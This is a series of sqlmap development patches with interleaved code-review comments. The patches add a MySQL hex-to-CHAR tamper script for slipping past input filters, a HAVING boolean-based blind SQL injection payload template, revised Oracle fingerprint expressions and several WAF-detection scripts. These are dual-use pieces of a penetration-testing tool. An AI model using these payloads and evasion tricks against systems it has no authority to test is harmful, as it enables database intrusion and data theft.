@@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful in cases when web application does the upper casing + + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): + if len(match.group(1)) > 2: + result = "CONCAT(%s)" % ','.join("CHAR(%d)" % ord(_) for _ in match.group(1).decode("hex")) + else: + result = "CHAR(%d)" % ord(match.group(1).decode("hex")) + retVal = retVal.replace(match.group(0), result) + + return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 24ec8962fb3..aa08dc70748 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dbf72e4b82773ade88cc34a53f80abcb lib/core/settings.py +dcdc0a7179010067fdbf8ad1fa9ab09e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 
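Review bot: An odd number of hex digits, e.g. `0xabc`, is accepted by the pattern in `tamper` but `match.group(1).decode("hex")` then raises (`TypeError: Odd-length string`), so the whole tamper call fails instead of leaving that token untouched. Matching only whole bytes removes the case: `for match in re.finditer(r"\b0x((?:[0-9a-f]{2})+)\b", retVal):`. Note also that `.decode("hex")` exists only on Python 2 strings; `binascii.unhexlify(match.group(1))` gives the same bytes on both major versions and is a one-line change on each branch. The pattern is lower-case only, which looks intentional given the docstring's note about upper-casing applications, but a short comment stating that `0x` literals are expected lower-case from the payload generator would save the next reader from adding `re.I` by reflex.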
@@ -226,6 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py 5c8583dd47f92935ceb41210a10eeebf sqlmap.py +b2c2cc55ba4e31bea94494dcafe5d8cc tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From e7d448c56c228d084b131815ff74492a80da2695 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 1 Jun 2018 10:21:59 +0200 Subject: [PATCH 150/428] Minor update regarding #3129 --- lib/core/settings.py | 2 +- lib/parse/html.py | 4 +++- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 624222b0750..3393569f94c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.24" +VERSION = "1.2.6.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/html.py b/lib/parse/html.py index c80bc3599b5..a7eb7d7ca63 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -9,6 +9,7 @@ from xml.sax.handler import ContentHandler +from lib.core.common import urldecode from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths @@ -26,6 +27,7 @@ def __init__(self, page): self._dbms = None self._page = (page or "") self._lower_page = self._page.lower() + self._urldecoded_page = urldecode(self._page) self.dbms = None 
@@ -47,7 +49,7 @@ def startElement(self, name, attrs): keywords = sorted(keywords, key=len) kb.cache.regex[regexp] = keywords[-1].lower() - if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I): + if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I): self.dbms = self._dbms self._markAsErrorPage() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa08dc70748..e5d8636a3d8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dcdc0a7179010067fdbf8ad1fa9ab09e lib/core/settings.py +cd402ab35a20d44b7404bcc18f652a16 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -62,7 +62,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py -33f21b11b7963062df8fa2292229df80 lib/parse/html.py +1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py From c1825b2651098166579b0393b683ecde354e58c2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 1 Jun 2018 11:23:41 +0200 Subject: [PATCH 151/428] Patch for #3130 --- lib/core/settings.py | 2 +- lib/core/update.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3393569f94c..1dabb6fed40 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
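Review bot: The fast substring check on the changed line still reads `self._lower_page`, which is built from the raw page, while `re.search` now runs over `self._urldecoded_page`; a DBMS error string that appears only in URL-encoded form is rejected by the `in` test before the decoded search is reached, so the fix only takes effect when the keyword survives encoding but the rest of the regexp does not. Deriving the pre-check from the same text keeps the two in step, e.g. in the `__init__` hunk above `self._lower_page = self._urldecoded_page.lower()` (this assumes `urldecode` returns a string for every page it is given here — confirm it never returns None). The `__init__` hunk and the import hunk above belong to the same change; `startElement` starts outside this hunk.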
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.0" +VERSION = "1.2.6.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index af939aa6c80..ce5f87e4811 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -49,6 +49,7 @@ def update(): errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) logger.error(errMsg) else: + attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode for wildcard in ('*', ".*"): for _ in glob.glob(os.path.join(directory, wildcard)): try: @@ -83,6 +84,8 @@ def update(): else: if not success: logger.error("update could not be completed") + else: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e5d8636a3d8..c473dace712 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
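Review bot: `attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode` in the first `update.py` hunk is unguarded, so a missing or unreadable `sqlmap.py` in `directory` raises OSError out of `update()` rather than taking the logged-error path the surrounding code uses, and if the `else:` added in the second hunk can be reached without that assignment having run, `attrs` is unbound there (whether that is possible depends on control flow outside the hunks). A defensive form is `attrs = os.stat(path).st_mode if os.path.isfile(path) else None` paired with `if attrs is not None: os.chmod(path, attrs)`, with `path = os.path.join(directory, "sqlmap.py")` computed once. A comment on the chmod line, `# restore the pre-update mode bits (e.g. executable) lost when the file was rewritten`, would record the intent; other files in the tree that carry mode bits are not covered by this change.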
@@ -47,14 +47,14 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cd402ab35a20d44b7404bcc18f652a16 lib/core/settings.py +993fd299707fdb019bfe4e12967da74c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py +c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 5381d4d5bea9e4307be3cc21fa5c46109f83955f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 4 Jun 2018 23:33:07 +0200 Subject: [PATCH 152/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/anquanbao.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1dabb6fed40..308baf55fe5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.1" +VERSION = "1.2.6.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c473dace712..3cabca07bbc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -993fd299707fdb019bfe4e12967da74c lib/core/settings.py +240e554483cc86de3fc483858dc8cb7b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -390,7 +390,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py 667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py -003cc986b2f5899fe3c85b6309c4b556 waf/anquanbao.py +7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py dec64f18c23962d279cc1cde6469afed waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py diff --git a/waf/anquanbao.py b/waf/anquanbao.py index 4aacfab521a..42f608c7bae 100644 --- a/waf/anquanbao.py +++ b/waf/anquanbao.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None - retval |= code == 405 and "/aqb_cc/error/" in (page or "") + retval |= code == 405 and any(_ in (page or "") for _ in ("/aqb_cc/error/", "hidden_intercept_time")) if retval: break From ed37ae1562a2b2223d1d66ada646e2dc8ef5097d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:05:17 +0200 Subject: [PATCH 153/428] Adding new WAF script (Cloudbric) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/cloudbric.py | 22 ++++++++++++++++++++++ 3 files changed, 25 insertions(+), 2 deletions(-) create mode 100644 waf/cloudbric.py 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 308baf55fe5..4ee5deada13 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.2" +VERSION = "1.2.6.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3cabca07bbc..687e2db099c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -240e554483cc86de3fc483858dc8cb7b lib/core/settings.py +8dc42e1cb53bbbac2172f1edd5077597 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -400,6 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py +e70fbe03e1338f3d3a412136b033e3d6 waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py new file mode 100644 index 00000000000..df84c67c842 --- /dev/null +++ b/waf/cloudbric.py 
@@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Cloudbric WAF (Cloudbric)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = code >= 400 and all(_ in (page or "") for _ in ("Cloudbric", "Malicious Code Detected")) + + return retval From a399b6503328e8cab7608a1e9fd3e6a6134ca403 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:20:37 +0200 Subject: [PATCH 154/428] Trivial update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/cloudbric.py | 2 +- waf/edgecast.py | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4ee5deada13..52ca5b42e1b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.3" +VERSION = "1.2.6.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 687e2db099c..30153c9dd31 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
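Review bot: The loop in `detect` never stops on a positive match: `retval` is reassigned on every iteration, so a hit on an earlier attack vector is overwritten by the result of the last one, the function reports only whether the final vector tripped the WAF, and every request is sent regardless. The sibling scripts in this series (anquanbao, varnish) end the loop body with `if retval: break`; add the same two lines after the `retval = ...` assignment. `re` and `HTTP_HEADER` are imported but unused in the new file and can be dropped.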
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8dc42e1cb53bbbac2172f1edd5077597 lib/core/settings.py +9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -400,7 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -e70fbe03e1338f3d3a412136b033e3d6 waf/cloudbric.py +cf979f0393523c028d8190ef6116884f waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py @@ -408,7 +408,7 @@ ac96f34c254951d301973617064eb1b5 waf/comodo.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py -ad20145a12cff50d49085ed06c8e422b waf/edgecast.py +7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py index df84c67c842..bbe79e5d810 100644 --- a/waf/cloudbric.py +++ b/waf/cloudbric.py @@ -10,7 +10,7 @@ from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "Cloudbric WAF (Cloudbric)" +__product__ = "Cloudbric Web Application Firewall (Cloudbric)" def detect(get_page): retval = False diff --git a/waf/edgecast.py b/waf/edgecast.py index 92db2f789c6..ad789b0793f 100644 --- a/waf/edgecast.py +++ b/waf/edgecast.py 
@@ -10,7 +10,7 @@ from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "EdgeCast WAF (Verizon)" +__product__ = "EdgeCast Web Application Firewall (Verizon)" def detect(get_page): retval = False From 25369ca5919b6934b10de62703460dd069396578 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:59:47 +0200 Subject: [PATCH 155/428] Adding new payload (HAVING boolean-based blind) --- lib/core/settings.py | 2 +- plugins/dbms/oracle/fingerprint.py | 10 +++++----- txt/checksum.md5 | 6 +++--- xml/payloads/boolean_blind.xml | 17 +++++++++++++++++ 4 files changed, 26 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 52ca5b42e1b..e86a644a818 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.4" +VERSION = "1.2.6.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 2d4f46369f1..22a8a6968e5 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py 
@@ -68,23 +68,23 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database + # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if result: infoMsg = "confirming %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") + result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30153c9dd31..28219c3b1da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py +ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 
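Review bot: The second `# NOTE:` comment was carried over verbatim from the previous expression and now asserts that `SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL` does not work over a direct connection, while the hunk gives no sign this was re-checked for the new form (the `[RANDNUM1]` placeholder also has to be substituted by `checkBooleanExpression` before it is valid SQL at all). If the direct-connection limitation was not verified, soften it to `# NOTE: the -d path skips this check; earlier forms failed there, the NVL/RAWTOHEX form is untested -- verify`. A short why-comment on what the `NVL(RAWTOHEX(...))` combination is meant to exclude would help the next reader, since nothing in the hunk explains the choice. `checkDbms` starts and ends outside the hunk.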
@@ -177,7 +177,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py +538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py 9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py 5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py @@ -467,7 +467,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml +3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 114097cf79d..ecf19cf8a19 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1361,6 +1361,23 @@ Tag: SAP MaxDB + + + + HAVING boolean-based blind - WHERE, GROUP BY clause + 1 + 3 + 1 + 1,2 + 1 + HAVING [INFERENCE] + + HAVING [RANDNUM]=[RANDNUM] + + + HAVING [RANDNUM]=[RANDNUM1] + + From c89f119e1afcb08431d1d85b674df39e33778556 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 01:12:50 +0200 Subject: [PATCH 156/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/varnish.py | 1 + 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e86a644a818..221c9142346 100644 --- a/lib/core/settings.py 
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.5" +VERSION = "1.2.6.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 28219c3b1da..3ec7ad935e1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py +def1ed8934e08b37d5e6455554cb2be8 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -444,7 +444,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -814fcc4ab087fb181ddad5fc12bd3d53 waf/varnish.py +f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/varnish.py b/waf/varnish.py index 3075866336b..a1384d6eac2 100644 --- a/waf/varnish.py +++ b/waf/varnish.py 
@@ -21,6 +21,7 @@ def detect(get_page): retval |= re.search(r"varnish\Z", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None retval |= re.search(r"varnish", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None retval |= code == 404 and re.search(r"\bXID: \d+", page or "") is not None + retval |= code >= 400 and "Request rejected by xVarnish-WAF" in (page or "") if retval: break From 86303bde5526d464973b252ef43a5c4259819024 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:24:29 +0200 Subject: [PATCH 157/428] Trivial update (wording) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 4 ++-- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 221c9142346..2bea0c6ba05 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.6" +VERSION = "1.2.6.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2631a7b046d..fb7bddd7d01 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
